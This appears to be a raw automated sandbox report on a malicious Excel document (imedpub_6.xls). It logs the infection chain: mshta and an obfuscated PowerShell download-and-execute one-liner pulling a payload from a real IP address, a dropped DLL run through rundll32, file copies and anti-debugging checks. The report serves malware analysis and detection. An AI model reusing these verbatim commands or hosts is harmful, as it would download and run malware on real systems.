Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00355E60 11_2_00355E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036AE6D 11_2_0036AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00360E53 11_2_00360E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035EE81 11_2_0035EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035AEFB 11_2_0035AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354EE3 11_2_00354EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00369EEC 11_2_00369EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036DEDC 11_2_0036DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370F33 11_2_00370F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035CF47 11_2_0035CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035DFF3 11_2_0035DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00357FF2 11_2_00357FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B3C3C 13_2_003B3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B9011 13_2_003B9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C044F 13_2_003C044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C20BA 13_2_003C20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BF8FD 13_2_003BF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BD6D8 13_2_003BD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C473C 13_2_003C473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C4116 13_2_003C4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D13AD 13_2_003D13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BAB87 13_2_003BAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C95FA 13_2_003C95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B7FF2 13_2_003B7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B59F2 13_2_003B59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B3E3F 13_2_003B3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CAC3A 13_2_003CAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D0E3A 13_2_003D0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CF435 13_2_003CF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CAA30 13_2_003CAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B7C37 13_2_003B7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CC631 13_2_003CC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CBE27 13_2_003CBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D0C14 13_2_003D0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B4816 13_2_003B4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C8606 13_2_003C8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C0001 13_2_003C0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C907F 13_2_003C907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CAE6D 13_2_003CAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CA666 13_2_003CA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B5E60 13_2_003B5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B4C5D 13_2_003B4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B2051 13_2_003B2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B2251 13_2_003B2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D0056 13_2_003D0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B1A56 13_2_003B1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C0E53 13_2_003C0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C6C49 13_2_003C6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B70B3 13_2_003B70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BF09B 13_2_003BF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BEA99 13_2_003BEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C1889 13_2_003C1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BEE81 13_2_003BEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BAEFB 13_2_003BAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CDCF7 13_2_003CDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C9EEC 13_2_003C9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CA2E8 13_2_003CA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B4EE3 13_2_003B4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B64E2 13_2_003B64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CDEDC 13_2_003CDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C66CA 13_2_003C66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BE2CC 13_2_003BE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C5CC4 13_2_003C5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BB2C7 13_2_003BB2C7
Source: 4173.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: imedpub_6.xls Macro extractor: Sheet name: REEEEEEEE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BE249 DeleteService, 13_2_003BE249
Source: imedpub_6.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Fjmda\
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: imedpub_6.xls OLE indicator, VBA macros: true
Source: imedpub_6.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@21/12@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: imedpub_6.xls OLE indicator, Workbook stream: true
Source: imedpub_6.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: imedpub_6.xls ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE05F.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: 4173.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F30CA push 8B4902ADh; iretd 4_3_032F30CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x94782

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 2192 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344087 mov eax, dword ptr fs:[00000030h] 9_2_00344087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4087 mov eax, dword ptr fs:[00000030h] 10_2_001D4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00364087 mov eax, dword ptr fs:[00000030h] 11_2_00364087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C4087 mov eax, dword ptr fs:[00000030h] 13_2_003C4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00204087 mov eax, dword ptr fs:[00000030h] 14_2_00204087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
